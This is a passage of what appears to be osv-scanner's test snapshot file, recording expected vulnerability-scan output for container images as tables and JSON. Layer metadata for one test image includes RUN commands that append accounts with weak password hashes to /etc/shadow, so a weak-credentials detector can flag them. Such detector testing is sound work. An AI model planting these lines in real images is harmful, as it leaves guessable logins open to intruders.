| alpine | | openssl | 3.1.4-r5 | Fix Available | 9 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_node_modules_using_pnpm_with_some_packages - 2] --- [TestCommand_OCIImage/scanning_node_modules_using_yarn_with_no_packages - 1] Scanning local image tarball "./testdata/test-node_modules-yarn-empty.tar" Container Scanning Result (Alpine Linux v3.19) (Based on "library/node" image): Total 2 packages affected by 15 known vulnerabilities (1 Critical, 3 High, 9 Medium, 2 Low, 0 Unknown) from 1 ecosystem. 15 vulnerabilities can be fixed. Alpine:v3.19 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r15 | Fix Available | 6 | busybox... (3) | # 0 Layer | alpine | | openssl | 3.1.4-r5 | Fix Available | 9 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_node_modules_using_yarn_with_no_packages - 2] --- [TestCommand_OCIImage/scanning_node_modules_using_yarn_with_some_packages - 1] Scanning local image tarball "./testdata/test-node_modules-yarn-full.tar" Container Scanning Result (Alpine Linux v3.19) (Based on "library/node" image): Total 2 packages affected by 15 known vulnerabilities (1 Critical, 3 High, 9 Medium, 2 Low, 0 Unknown) from 1 ecosystem. 15 vulnerabilities can be fixed. Alpine:v3.19 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r15 | Fix Available | 6 | busybox... (3) | # 0 Layer | alpine | | openssl | 3.1.4-r5 | Fix Available | 9 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_node_modules_using_yarn_with_some_packages - 2] --- [TestCommand_OCIImage_JSONFormat/Scanning_python_image_with_some_packages - 1] { "results": [ { "source": { "path": "/usr/local/lib/python3.9/ensurepip/_bundled/pip-23.0.1-py3-none-any.whl", "type": "artifact" }, "packages": [ { "package": { "name": "pip", "version": "23.0.1", "ecosystem": "PyPI", "image_origin_details": { "index": 7 } }, "groups": 3, "vulnerabilities": [ "PYSEC-2023-228", "GHSA-4xh5-x5gv-qwph", "GHSA-6vgw-5pg2-w6jp", "GHSA-mq26-g339-26xf" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/ensurepip/_bundled/setuptools-58.1.0-py3-none-any.whl", "type": "artifact" }, "packages": [ { "package": { "name": "setuptools", "version": "58.1.0", "ecosystem": "PyPI", "image_origin_details": { "index": 7 } }, "groups": 3, "vulnerabilities": [ "PYSEC-2022-43012", "PYSEC-2025-49", "GHSA-5rjg-fvgr-3xxf", "GHSA-cx63-2mw6-8hw5", "GHSA-r9hx-vwmv-q579" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/Django-1.11.29.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "django", "version": "1.11.29", "ecosystem": "PyPI", "image_origin_details": { "index": 17 } }, "groups": 7, "vulnerabilities": [ "PYSEC-2021-98", "GHSA-68w8-qjq3-2gfm", "GHSA-6w2r-r2m5-xq5w", "GHSA-7xr5-9hcq-chf9", "GHSA-8x94-hmjh-97hq", "GHSA-frmv-pr5f-9mcr", "GHSA-qw25-v68c-qjf3", "GHSA-rrqc-c2jx-6jgv" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/Flask-0.12.2.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "flask", "version": "0.12.2", "ecosystem": "PyPI", "image_origin_details": { "index": 17 } }, "groups": 4, "vulnerabilities": [ "PYSEC-2018-66", "PYSEC-2019-179", "PYSEC-2023-62", "GHSA-562c-5r94-xh97", "GHSA-5wv5-4vpf-pj6m", "GHSA-68rp-wp8r-4726", "GHSA-m2qf-hxjv-5gpq" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/idna-2.7.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "idna", "version": "2.7", "ecosystem": "PyPI", "image_origin_details": { "index": 17 } }, "groups": 1, "vulnerabilities": [ "PYSEC-2024-60", "GHSA-jjg7-2v4v-x38h" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/pip-23.0.1.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "pip", "version": "23.0.1", "ecosystem": "PyPI", "image_origin_details": { "index": 13 } }, "groups": 3, "vulnerabilities": [ "PYSEC-2023-228", "GHSA-4xh5-x5gv-qwph", "GHSA-6vgw-5pg2-w6jp", "GHSA-mq26-g339-26xf" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/requests-2.20.0.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "requests", "version": "2.20.0", "ecosystem": "PyPI", "image_origin_details": { "index": 17 } }, "groups": 3, "vulnerabilities": [ "PYSEC-2023-74", "GHSA-9hjg-9r4m-mvj7", "GHSA-9wx4-h78v-vm56", "GHSA-j8r2-6x86-q33q" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/setuptools-58.1.0.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "setuptools", "version": "58.1.0", "ecosystem": "PyPI", "image_origin_details": { "index": 13 } }, "groups": 3, "vulnerabilities": [ "PYSEC-2022-43012", "PYSEC-2025-49", "GHSA-5rjg-fvgr-3xxf", "GHSA-cx63-2mw6-8hw5", "GHSA-r9hx-vwmv-q579" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/urllib3-1.24.3.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "urllib3", "version": "1.24.3", "ecosystem": "PyPI", "image_origin_details": { "index": 17 } }, "groups": 9, "vulnerabilities": [ "PYSEC-2020-148", "PYSEC-2021-108", "PYSEC-2023-192", "PYSEC-2023-212", "GHSA-2xpw-w6gg-jr37", "GHSA-34jh-p97f-mpxf", "GHSA-38jv-5279-wg99", "GHSA-g4mx-q9vg-27p4", "GHSA-gm62-xv2j-4w53", "GHSA-pq67-6m6q-mj2v", "GHSA-v845-jxx5-vc9f", "GHSA-wqvq-5m8c-6g24" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/werkzeug-3.1.4.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "werkzeug", "version": "3.1.4", "ecosystem": "PyPI", "image_origin_details": { "index": 17 } }, "groups": 2, "vulnerabilities": [ "GHSA-29vq-49wr-vm6x", "GHSA-87hc-h4r5-73f7" ] } ] }, { "source": { "path": "/usr/local/lib/python3.9/site-packages/wheel-0.40.0.dist-info/METADATA", "type": "artifact" }, "packages": [ { "package": { "name": "wheel", "version": "0.40.0", "ecosystem": "PyPI", "image_origin_details": { "index": 13 } }, "groups": 1, "vulnerabilities": [ "GHSA-8rrh-rw8j-w5fx" ] } ] }, { "source": { "path": "/var/lib/dpkg/status", "type": "os" }, "packages": [ { "package": { "name": "debian-archive-keyring", "os_package_name": "debian-archive-keyring", "version": "2019.1+deb10u1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3482-1" ] }, { "package": { "name": "util-linux", "os_package_name": "fdisk", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "util-linux", "os_package_name": "libblkid1", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "glibc", "os_package_name": "libc-bin", "version": "2.28-10+deb10u2", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3850-1", "DLA-3807-1" ] }, { "package": { "name": "glibc", "os_package_name": "libc6", "version": "2.28-10+deb10u2", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3850-1", "DLA-3807-1" ] }, { "package": { "name": "expat", "os_package_name": "libexpat1", "version": "2.2.6-2+deb10u6", "ecosystem": "Debian:10", "image_origin_details": { "index": 7 } }, "groups": 1, "vulnerabilities": [ "DLA-3783-1" ] }, { "package": { "name": "util-linux", "os_package_name": "libfdisk1", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "gnutls28", "os_package_name": "libgnutls30", "version": "3.6.7-4+deb10u10", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3660-1", "DLA-3740-1" ] }, { "package": { "name": "util-linux", "os_package_name": "libmount1", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "ncurses", "os_package_name": "libncursesw6", "version": "6.1+20181013-2+deb10u3", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3682-1", "DLA-3586-1" ] }, { "package": { "name": "util-linux", "os_package_name": "libsmartcols1", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "openssl", "os_package_name": "libssl1.1", "version": "1.1.1n-0+deb10u5", "ecosystem": "Debian:10", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "DLA-3530-1" ] }, { "package": { "name": "systemd", "os_package_name": "libsystemd0", "version": "241-7~deb10u9", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3474-1" ] }, { "package": { "name": "ncurses", "os_package_name": "libtinfo6", "version": "6.1+20181013-2+deb10u3", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3682-1", "DLA-3586-1" ] }, { "package": { "name": "systemd", "os_package_name": "libudev1", "version": "241-7~deb10u9", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3474-1" ] }, { "package": { "name": "util-linux", "os_package_name": "libuuid1", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "util-linux", "os_package_name": "mount", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] }, { "package": { "name": "ncurses", "os_package_name": "ncurses-base", "version": "6.1+20181013-2+deb10u3", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3682-1", "DLA-3586-1" ] }, { "package": { "name": "ncurses", "os_package_name": "ncurses-bin", "version": "6.1+20181013-2+deb10u3", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3682-1", "DLA-3586-1" ] }, { "package": { "name": "openssl", "os_package_name": "openssl", "version": "1.1.1n-0+deb10u5", "ecosystem": "Debian:10", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "DLA-3530-1" ] }, { "package": { "name": "tar", "os_package_name": "tar", "version": "1.30+dfsg-6", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3755-1" ] }, { "package": { "name": "tzdata", "os_package_name": "tzdata", "version": "2021a-0+deb10u11", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "DLA-3684-1", "DLA-3788-1" ] }, { "package": { "name": "util-linux", "os_package_name": "util-linux", "version": "2.33.1-0.1", "ecosystem": "Debian:10", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "DLA-3782-1" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "image_metadata": { "os": "Debian GNU/Linux 10 (buster)", "layer_metadata": [ { "diff_id": "sha256:...", "command": "ADD file:2818e508d01da218...", "is_empty": false, "base_image_index": 2 }, { "diff_id": "", "command": "CMD [/"bash/"]", "is_empty": true, "base_image_index": 2 }, { "diff_id": "", "command": "ENV PATH=/usr/local/bin:/...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "ENV LANG=C.UTF-8", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c set -eux; ...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "ENV GPG_KEY=E3FF2839C048B...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "ENV PYTHON_VERSION=3.9.17", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c set -eux; ...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c set -eux; ...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "ENV PYTHON_PIP_VERSION=23...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "ENV PYTHON_SETUPTOOLS_VER...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "ENV PYTHON_GET_PIP_URL=ht...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "ENV PYTHON_GET_PIP_SHA256...", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c set -eux; ...", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "CMD [/"python3/"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "WORKDIR /app", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "COPY ./python-fixture/req...", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c pip instal...", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "COPY python-fixture/main....", "is_empty": false, "base_image_index": 0 }, { "diff_id": "", "command": "CMD [/"python/" /"main.py/"]", "is_empty": true, "base_image_index": 0 } ], "base_images": [ {}, { "name": "python", "tags": null }, { "name": "debian", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/Scanning_python_image_with_some_packages - 2] Scanning local image tarball "./testdata/test-python-full.tar" --- [TestCommand_OCIImage_JSONFormat/scanning_image_with_deprecated_packages - 1] { "results": [ { "source": { "path": "/app/rust_novuln_deprecated", "type": "artifact" }, "packages": [ { "package": { "name": "url", "version": "2.5.3", "ecosystem": "crates.io", "deprecated": true, "image_origin_details": { "index": 2 } } } ] }, { "source": { "path": "/lib/apk/db/installed", "type": "os" }, "packages": [ { "package": { "name": "busybox", "os_package_name": "busybox", "version": "1.37.0-r19", "ecosystem": "Alpine:v3.22", "commit": "bd8ab811155a6087ba7480103d89e2500e3cb0eb", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "busybox", "os_package_name": "busybox-binsh", "version": "1.37.0-r19", "ecosystem": "Alpine:v3.22", "commit": "bd8ab811155a6087ba7480103d89e2500e3cb0eb", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "openssl", "os_package_name": "libcrypto3", "version": "3.5.4-r0", "ecosystem": "Alpine:v3.22", "commit": "8f330e62bd41c2ac23dbd866fea36fb8e22f8422", "image_origin_details": { "index": 0 } }, "groups": 12, "vulnerabilities": [ "ALPINE-CVE-2025-11187", "ALPINE-CVE-2025-15467", "ALPINE-CVE-2025-15468", "ALPINE-CVE-2025-15469", "ALPINE-CVE-2025-66199", "ALPINE-CVE-2025-68160", "ALPINE-CVE-2025-69418", "ALPINE-CVE-2025-69419", "ALPINE-CVE-2025-69420", "ALPINE-CVE-2025-69421", "ALPINE-CVE-2026-22795", "ALPINE-CVE-2026-22796" ] }, { "package": { "name": "openssl", "os_package_name": "libssl3", "version": "3.5.4-r0", "ecosystem": "Alpine:v3.22", "commit": "8f330e62bd41c2ac23dbd866fea36fb8e22f8422", "image_origin_details": { "index": 0 } }, "groups": 12, "vulnerabilities": [ "ALPINE-CVE-2025-11187", "ALPINE-CVE-2025-15467", "ALPINE-CVE-2025-15468", "ALPINE-CVE-2025-15469", "ALPINE-CVE-2025-66199", "ALPINE-CVE-2025-68160", "ALPINE-CVE-2025-69418", "ALPINE-CVE-2025-69419", "ALPINE-CVE-2025-69420", "ALPINE-CVE-2025-69421", "ALPINE-CVE-2026-22795", "ALPINE-CVE-2026-22796" ] }, { "package": { "name": "busybox", "os_package_name": "ssl_client", "version": "1.37.0-r19", "ecosystem": "Alpine:v3.22", "commit": "bd8ab811155a6087ba7480103d89e2500e3cb0eb", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "image_metadata": { "os": "Alpine Linux v3.22", "layer_metadata": [ { "diff_id": "sha256:...", "command": "ADD alpine-minirootfs-3.22.2-x86_64.tar.gz / # buildkit", "is_empty": false, "base_image_index": 2 }, { "diff_id": "", "command": "CMD [/"/bin/sh/"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "COPY /app/target/release/rust_novuln_deprecated /app/rust_novuln_deprecated # buildkit", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "alpine", "tags": null }, { "name": "alpine", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/scanning_image_with_deprecated_packages - 2] Scanning local image tarball "./testdata/test-image-with-deprecated.tar" --- [TestCommand_OCIImage_JSONFormat/scanning_image_with_go_binary - 1] { "results": [ { "source": { "path": "/go/bin/ptf-1.4.0", "type": "artifact" }, "packages": [ { "package": { "name": "github.com/BurntSushi/toml", "version": "1.4.0", "ecosystem": "Go", "image_origin_details": { "index": 2 } } }, { "package": { "name": "stdlib", "version": "1.22.4", "ecosystem": "Go", "image_origin_details": { "index": 2 } }, "groups": 32, "vulnerabilities": [ "GO-2024-2963", "GO-2024-3105", "GO-2024-3106", "GO-2024-3107", "GO-2025-3373", "GO-2025-3420", "GO-2025-3447", "GO-2025-3563", "GO-2025-3750", "GO-2025-3751", "GO-2025-3849", "GO-2025-3956", "GO-2025-4006", "GO-2025-4007", "GO-2025-4008", "GO-2025-4009", "GO-2025-4010", "GO-2025-4011", "GO-2025-4012", "GO-2025-4013", "GO-2025-4014", "GO-2025-4015", "GO-2025-4155", "GO-2025-4175", "GO-2026-4337", "GO-2026-4340", "GO-2026-4341", "GO-2026-4342", "GO-2026-4403", "GO-2026-4601", "GO-2026-4602", "GO-2026-4603" ] }, { "package": { "name": "ptf", "version": "(devel)", "ecosystem": "Go", "image_origin_details": { "index": 2 } } } ] }, { "source": { "path": "/lib/apk/db/installed", "type": "os" }, "packages": [ { "package": { "name": "alpine-baselayout", "os_package_name": "alpine-baselayout", "version": "3.6.5-r0", "ecosystem": "Alpine:v3.20", "commit": "66187892e05b03a41d08e9acabd19b7576a1c875", "image_origin_details": { "index": 0 } } }, { "package": { "name": "alpine-baselayout", "os_package_name": "alpine-baselayout-data", "version": "3.6.5-r0", "ecosystem": "Alpine:v3.20", "commit": "66187892e05b03a41d08e9acabd19b7576a1c875", "image_origin_details": { "index": 0 } } }, { "package": { "name": "alpine-keys", "os_package_name": "alpine-keys", "version": "2.4-r1", "ecosystem": "Alpine:v3.20", "commit": "aab68f8c9ab434a46710de8e12fb3206e2930a59", "image_origin_details": { "index": 0 } } }, { "package": { "name": "apk-tools", "os_package_name": "apk-tools", "version": "2.14.4-r0", "ecosystem": "Alpine:v3.20", "commit": "d435c805af8af4171438da3ec3429c094aac4c6e", "image_origin_details": { "index": 0 } } }, { "package": { "name": "busybox", "os_package_name": "busybox", "version": "1.36.1-r29", "ecosystem": "Alpine:v3.20", "commit": "1747c01fb96905f101c25609011589d28e01cbb8", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "busybox", "os_package_name": "busybox-binsh", "version": "1.36.1-r29", "ecosystem": "Alpine:v3.20", "commit": "1747c01fb96905f101c25609011589d28e01cbb8", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "ca-certificates", "os_package_name": "ca-certificates-bundle", "version": "20240226-r0", "ecosystem": "Alpine:v3.20", "commit": "56fb003da0adcea3b59373ef6a633d0c5bfef3ac", "image_origin_details": { "index": 0 } } }, { "package": { "name": "openssl", "os_package_name": "libcrypto3", "version": "3.3.1-r0", "ecosystem": "Alpine:v3.20", "commit": "15cc530882e1e6f3dc8a77200ee8bd01cb98f53c", "image_origin_details": { "index": 0 } }, "groups": 18, "vulnerabilities": [ "ALPINE-CVE-2024-12797", "ALPINE-CVE-2024-13176", "ALPINE-CVE-2024-5535", "ALPINE-CVE-2024-6119", "ALPINE-CVE-2024-9143", "ALPINE-CVE-2025-15467", "ALPINE-CVE-2025-15468", "ALPINE-CVE-2025-66199", "ALPINE-CVE-2025-68160", "ALPINE-CVE-2025-69418", "ALPINE-CVE-2025-69419", "ALPINE-CVE-2025-69420", "ALPINE-CVE-2025-69421", "ALPINE-CVE-2025-9230", "ALPINE-CVE-2025-9231", "ALPINE-CVE-2025-9232", "ALPINE-CVE-2026-22795", "ALPINE-CVE-2026-22796" ] }, { "package": { "name": "openssl", "os_package_name": "libssl3", "version": "3.3.1-r0", "ecosystem": "Alpine:v3.20", "commit": "15cc530882e1e6f3dc8a77200ee8bd01cb98f53c", "image_origin_details": { "index": 0 } }, "groups": 18, "vulnerabilities": [ "ALPINE-CVE-2024-12797", "ALPINE-CVE-2024-13176", "ALPINE-CVE-2024-5535", "ALPINE-CVE-2024-6119", "ALPINE-CVE-2024-9143", "ALPINE-CVE-2025-15467", "ALPINE-CVE-2025-15468", "ALPINE-CVE-2025-66199", "ALPINE-CVE-2025-68160", "ALPINE-CVE-2025-69418", "ALPINE-CVE-2025-69419", "ALPINE-CVE-2025-69420", "ALPINE-CVE-2025-69421", "ALPINE-CVE-2025-9230", "ALPINE-CVE-2025-9231", "ALPINE-CVE-2025-9232", "ALPINE-CVE-2026-22795", "ALPINE-CVE-2026-22796" ] }, { "package": { "name": "musl", "os_package_name": "musl", "version": "1.2.5-r0", "ecosystem": "Alpine:v3.20", "commit": "4fe5bdbe47b100daa6380f81c4c8ea3f99b61362", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "ALPINE-CVE-2025-26519" ] }, { "package": { "name": "musl", "os_package_name": "musl-utils", "version": "1.2.5-r0", "ecosystem": "Alpine:v3.20", "commit": "4fe5bdbe47b100daa6380f81c4c8ea3f99b61362", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "ALPINE-CVE-2025-26519" ] }, { "package": { "name": "pax-utils", "os_package_name": "scanelf", "version": "1.3.7-r2", "ecosystem": "Alpine:v3.20", "commit": "e65a4f2d0470e70d862ef2b5c412ecf2cb9ad0a6", "image_origin_details": { "index": 0 } } }, { "package": { "name": "busybox", "os_package_name": "ssl_client", "version": "1.36.1-r29", "ecosystem": "Alpine:v3.20", "commit": "1747c01fb96905f101c25609011589d28e01cbb8", "image_origin_details": { "index": 0 } }, "groups": 2, "vulnerabilities": [ "ALPINE-CVE-2024-58251", "ALPINE-CVE-2025-46394" ] }, { "package": { "name": "zlib", "os_package_name": "zlib", "version": "1.3.1-r1", "ecosystem": "Alpine:v3.20", "commit": "fad2d175bd85eb4c5566765375392a7394dfbcf2", "image_origin_details": { "index": 0 } } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "image_metadata": { "os": "Alpine Linux v3.20", "layer_metadata": [ { "diff_id": "sha256:...", "command": "ADD file:33ebe56b967747a97dcec01bc2559962bee8823686c9739d26be060381bbb3ca in / ", "is_empty": false, "base_image_index": 2 }, { "diff_id": "", "command": "CMD [/"/bin/sh/"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "COPY /work/ptf-1.4.0 /go/bin/ # buildkit", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "alpine", "tags": null }, { "name": "alpine", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/scanning_image_with_go_binary - 2] Scanning local image tarball "./testdata/test-go-binary.tar" --- [TestCommand_OCIImage_JSONFormat/scanning_insecure_alpine_image_with_detector_preset - 1] { "results": [ { "source": { "path": "/lib/apk/db/installed", "type": "os" }, "packages": [ { "package": { "name": "apk-tools", "os_package_name": "apk-tools", "version": "2.10.6-r0", "ecosystem": "Alpine:v3.10", "commit": "ee458ccae264321745e9622c759baf110130eb2f", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "ALPINE-CVE-2021-36159" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "experimental_generic_findings": [ { "Adv": { "ID": { "Publisher": "SCALIBR", "Reference": "etc-shadow-weakcredentials" }, "Title": "Ensure all users have strong passwords configured", "Description": "The /etc/shadow file contains user account password hashes. These passwords must be strong and not easily guessable.", "Recommendation": "Run the following command to reset password for the reported users:/n# change password for USER: sudo passwd USER", "Sev": 5 }, "Target": { "Extra": "/etc/shadow: The following users have weak passwords:/nuser-bcrypt/n" }, "Plugins": [ "weakcredentials/etcshadow" ], "ExploitabilitySignals": null } ], "image_metadata": { "os": "Alpine Linux v3.10", "layer_metadata": [ { "diff_id": "sha256:...", "command": "/bin/sh -c #(nop) ADD file:c5377eaa926bf412dd8d4a08b0a1f2399cfd708743533b0aa03b53d14cb4bb4e in / ", "is_empty": false, "base_image_index": 2 }, { "diff_id": "", "command": "/bin/sh -c #(nop) CMD [/"/bin/sh/"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c echo 'user-bcrypt:$2b$05$IYDlXvHmeORyyiUwu8KKuek2LE8VrxIYZ2skPvRDDNngpXJHRq7sG' /u003e/u003e /etc/shadow # buildkit", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c echo 'user-descrypt:chERDiI95PGCQ' /u003e/u003e /etc/shadow # buildkit", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "alpine", "tags": null }, { "name": "alpine", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/scanning_insecure_alpine_image_with_detector_preset - 2] Scanning local image tarball "./testdata/test-alpine-etcshadow.tar" --- [TestCommand_OCIImage_JSONFormat/scanning_insecure_alpine_image_with_specific_detector_enabled - 1] { "results": [ { "source": { "path": "/lib/apk/db/installed", "type": "os" }, "packages": [ { "package": { "name": "apk-tools", "os_package_name": "apk-tools", "version": "2.10.6-r0", "ecosystem": "Alpine:v3.10", "commit": "ee458ccae264321745e9622c759baf110130eb2f", "image_origin_details": { "index": 0 } }, "groups": 1, "vulnerabilities": [ "ALPINE-CVE-2021-36159" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "experimental_generic_findings": [ { "Adv": { "ID": { "Publisher": "SCALIBR", "Reference": "etc-shadow-weakcredentials" }, "Title": "Ensure all users have strong passwords configured", "Description": "The /etc/shadow file contains user account password hashes. These passwords must be strong and not easily guessable.", "Recommendation": "Run the following command to reset password for the reported users:/n# change password for USER: sudo passwd USER", "Sev": 5 }, "Target": { "Extra": "/etc/shadow: The following users have weak passwords:/nuser-bcrypt/n" }, "Plugins": [ "weakcredentials/etcshadow" ], "ExploitabilitySignals": null } ], "image_metadata": { "os": "Alpine Linux v3.10", "layer_metadata": [ { "diff_id": "sha256:...", "command": "/bin/sh -c #(nop) ADD file:c5377eaa926bf412dd8d4a08b0a1f2399cfd708743533b0aa03b53d14cb4bb4e in / ", "is_empty": false, "base_image_index": 2 }, { "diff_id": "", "command": "/bin/sh -c #(nop) CMD [/"/bin/sh/"]", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "RUN /bin/sh -c echo 'user-bcrypt:$2b$05$IYDlXvHmeORyyiUwu8KKuek2LE8VrxIYZ2skPvRDDNngpXJHRq7sG' /u003e/u003e /etc/shadow # buildkit", "is_empty": false, "base_image_index": 0 